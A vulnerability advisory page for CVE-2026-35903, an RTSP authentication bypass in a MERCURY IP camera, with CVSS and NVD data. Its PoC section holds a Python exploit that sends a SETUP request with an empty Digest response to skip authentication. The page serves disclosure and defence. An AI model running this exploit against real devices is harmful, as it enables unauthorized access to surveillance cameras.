Security Vulnerability Report
中文
CVE-2026-35903 CVSS 9.8 CRITICAL

CVE-2026-35903

Published: 2026-04-27 19:16:53
Last Modified: 2026-05-05 13:39:47
Source: [email protected]

Description

MERCURY MIPC252W IP camera 1.0.5 Build 230306 Rel.79931n contains an improper authentication vulnerability in the RTSP service. After successful Digest authentication in an initial DESCRIBE request, the device does not verify the Digest response parameter in subsequent RTSP requests within the same session. As a result, RTSP methods such as SETUP, PLAY, and TEARDOWN can be processed even when the Authorization header contains an empty or invalid response value, as long as the nonce and session identifier correspond to a previously authenticated session. This allows an attacker with network access to reuse session parameters and issue unauthorized RTSP control commands without computing a valid Digest response.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:mercurycom:mipc252w_firmware:1.0.5:build_230306:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:mercurycom:mipc252w:-:*:*:*:*:*:*:* - NOT VULNERABLE
MERCURY MIPC252W 1.0.5 Build 230306 Rel.79931n

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # Target Configuration TARGET_IP = "192.168.1.10" TARGET_PORT = 554 # This PoC demonstrates the authentication bypass. # Step 1: Attacker establishes a session or captures valid nonce/session ID. # Step 2: Attacker sends RTSP commands with valid nonce/session but INVALID response. def exploit_rtsp_bypass(): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((TARGET_IP, TARGET_PORT)) # Initial DESCRIBE request to get the Nonce (Assuming we can sniff or have credentials for this step) # In a real attack, this phase requires one valid auth or network sniffing. req1 = "DESCRIBE rtsp://" + TARGET_IP + ":554/ RTSP/1.0\r\nCSeq: 1\r\nUser-Agent: Python/RTSP\r\n\r\n" sock.send(req1.encode()) resp1 = sock.recv(4096).decode() print("[+] Initial Response:", resp1.split('\r\n')[0]) # Assume we extracted Nonce: "abc123" and Realm: "MERCURY" from resp1 # And we performed a valid auth to get Session: "12345678" # Now we attempt to send a SETUP command with an EMPTY response parameter. # Malicious Authorization Header: Response is empty, but Nonce/Session are valid # This exploits the vulnerability: device checks Nonce/Session but ignores Response. malicious_auth = 'Digest username="admin", realm="MERCURY", nonce="abc123", uri="rtsp://192.168.1.10:554/", response=""' # Sending SETUP request to exploit the bypass exploit_req = ( "SETUP rtsp://" + TARGET_IP + ":554/trackID=1 RTSP/1.0\r\n" "CSeq: 2\r\n" "Session: 12345678\r\n" "Authorization: " + malicious_auth + "\r\n" "Transport: RTP/AVP;unicast;client_port=5000-5001\r\n" "\r\n" ) print("[*] Sending Exploit Request with empty Digest response...") sock.send(exploit_req.encode()) resp2 = sock.recv(4096).decode() print("[+] Exploit Response:", resp2.split('\r\n')[0]) if "200 OK" in resp2: print("[!] VULNERABILITY CONFIRMED: Authentication bypassed!") else: print("[-] Attack failed or patched.") sock.close() if __name__ == "__main__": exploit_rtsp_bypass()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35903", "sourceIdentifier": "[email protected]", "published": "2026-04-27T19:16:52.817", "lastModified": "2026-05-05T13:39:47.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MERCURY MIPC252W IP camera 1.0.5 Build 230306 Rel.79931n contains an improper authentication vulnerability in the RTSP service. After successful Digest authentication in an initial DESCRIBE request, the device does not verify the Digest response parameter in subsequent RTSP requests within the same session. As a result, RTSP methods such as SETUP, PLAY, and TEARDOWN can be processed even when the Authorization header contains an empty or invalid response value, as long as the nonce and session identifier correspond to a previously authenticated session. This allows an attacker with network access to reuse session parameters and issue unauthorized RTSP control commands without computing a valid Digest response."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:mercurycom:mipc252w_firmware:1.0.5:build_230306:*:*:*:*:*:*", "matchCriteriaId": "61FE2E9E-C0F5-4F45-B4F4-10E05CEB0395"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:mercurycom:mipc252w:-:*:*:*:*:*:*:*", "matchCriteriaId": "5CBF3BC0-1845-4D38-BFD2-3B02219C1BD8"}]}]}], "references": [{"url": "https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_4th/README.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/izxnfirh8148/CVE_REQUESTS_references/blob/main/MERCURY_MIPC252W/MERCURY_MIPC252W_4th/README.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.